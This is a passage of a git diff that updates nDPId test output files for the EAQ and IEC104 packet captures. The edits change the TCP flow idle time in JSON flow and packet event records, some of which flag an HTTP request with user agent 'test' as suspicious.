-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820948562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948562,"pkt":"ABoRAAACABoRAAABCABFAAA8xb9AAEAGRgEKCAABrcJ3MND5AFA4ezYlAAAAAKACOQisdgAAAgQFtAQCCAoABPOaAAAAAAEDAwQ="} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820948566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948566,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAGO9OtwncwCggAAQBQ0PnHhMnaOHs2JlAS\/\/+vjAAA"} -00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820948569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948569,"pkt":"ABoRAAACABoRAAABCABFAAAoxcBAAEAGRhQKCAABrcJ3MND5AFA4ezYmx4TJ21AQOQh2hQAA"} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948562,"flow_last_seen":1432820948576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1432820948576,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious 
User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com","url":"www.google.com\/","code":0,"content_type":"","user_agent":"test"}} -00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948836,"flow_last_seen":1432820948836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820948836,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432820948836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948836,"pkt":"ABoRAAACABoRAAABCABFAAA8DwhAAEAG\/NAKCAABrcJ3GJ4TAFBXrfy9AAAAAKACOQj5jgAAAgQFtAQCCAoABPO1AAAAAAEDAwQ="} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432820948837,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948837,"pkt":"ABoRAAACABoRAAABCABFAAAoAAZAABAGO+etwncYCggAAQBQnhOoUgNCV638vlAS\/\/\/iigAA"} 
-00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1432820948844,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948844,"pkt":"ABoRAAACABoRAAABCABFAAAoDwlAAEAG\/OMKCAABrcJ3GJ4TAFBXrfy+qFIDQ1AQOQipgwAA"} -00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948836,"flow_last_seen":1432820948845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820948845,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com.br","url":"www.google.com.br\/?gfe_rd=cr&ei=1BxnVcP9OKKk8we50oDAAg","code":0,"content_type":"","user_agent":"test"}} +00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948562,"flow_last_seen":1432820948562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820948562,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820948562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948562,"pkt":"ABoRAAACABoRAAABCABFAAA8xb9AAEAGRgEKCAABrcJ3MND5AFA4ezYlAAAAAKACOQisdgAAAgQFtAQCCAoABPOaAAAAAAEDAwQ="} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820948566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948566,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAGO9OtwncwCggAAQBQ0PnHhMnaOHs2JlAS\/\/+vjAAA"} +00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820948569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948569,"pkt":"ABoRAAACABoRAAABCABFAAAoxcBAAEAGRhQKCAABrcJ3MND5AFA4ezYmx4TJ21AQOQh2hQAA"} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948562,"flow_last_seen":1432820948576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1432820948576,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious 
User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com","url":"www.google.com\/","code":0,"content_type":"","user_agent":"test"}} +00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948836,"flow_last_seen":1432820948836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820948836,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432820948836,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948836,"pkt":"ABoRAAACABoRAAABCABFAAA8DwhAAEAG\/NAKCAABrcJ3GJ4TAFBXrfy9AAAAAKACOQj5jgAAAgQFtAQCCAoABPO1AAAAAAEDAwQ="} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432820948837,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948837,"pkt":"ABoRAAACABoRAAABCABFAAAoAAZAABAGO+etwncYCggAAQBQnhOoUgNCV638vlAS\/\/\/iigAA"} 
+00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1432820948844,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948844,"pkt":"ABoRAAACABoRAAABCABFAAAoDwlAAEAG\/OMKCAABrcJ3GJ4TAFBXrfy+qFIDQ1AQOQipgwAA"} +00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948836,"flow_last_seen":1432820948845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820948845,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com.br","url":"www.google.com.br\/?gfe_rd=cr&ei=1BxnVcP9OKKk8we50oDAAg","code":0,"content_type":"","user_agent":"test"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820949586,"flow_last_seen":1432820949586,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820949586,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432820949586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820949586,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR3WwKCAAByLmKkswhF3AAGNX0AAAAAAAADdoAAUsHAACQAA=="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432820949685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820949685,"pkt":"ABoRAAACABoRAAABCABFAAAsAAxAABARDWHIuYqSCggAARdwzCEAGAX1AAAAAAAADdoAAUsHAABgAA=="} 
@@ -162,7 +162,7 @@ 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950801,"flow_last_seen":1432821036105,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1432820948836,"flow_last_seen":1432820949347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2764,"flow_tot_l4_payload_len":9813,"flow_avg_l4_payload_len":700,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1432820948836,"flow_last_seen":1432820949347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2764,"flow_tot_l4_payload_len":9813,"flow_avg_l4_payload_len":700,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} 
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
@@ -172,7 +172,7 @@ 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820958981,"flow_last_seen":1432821045604,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820951932,"flow_last_seen":1432821038152,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949735,"flow_last_seen":1432821036045,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820948562,"flow_last_seen":1432820948767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":648,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820948562,"flow_last_seen":1432820948767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":648,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} 
00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820949806,"flow_last_seen":1432821036155,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820953931,"flow_last_seen":1432821040151,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} diff --git a/test/results/IEC104.pcap.out b/test/results/IEC104.pcap.out index a634d767a..eac1274c4 100644 --- a/test/results/IEC104.pcap.out +++ b/test/results/IEC104.pcap.out 
@@ -1,17 +1,17 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"IEC104.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1317629088495} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088495,"flow_last_seen":1317629088495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1317629088495,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1317629088495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317629088495,"pkt":"eCvLK7lWABIAxkrACABFAAAoUqRAAH0GWeoKr9MBCndpGglk1fBIoLt3AFkTVVAQ\/elpjgAAAAAAAAAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088520,"flow_last_seen":1317629088520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1317629088520,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 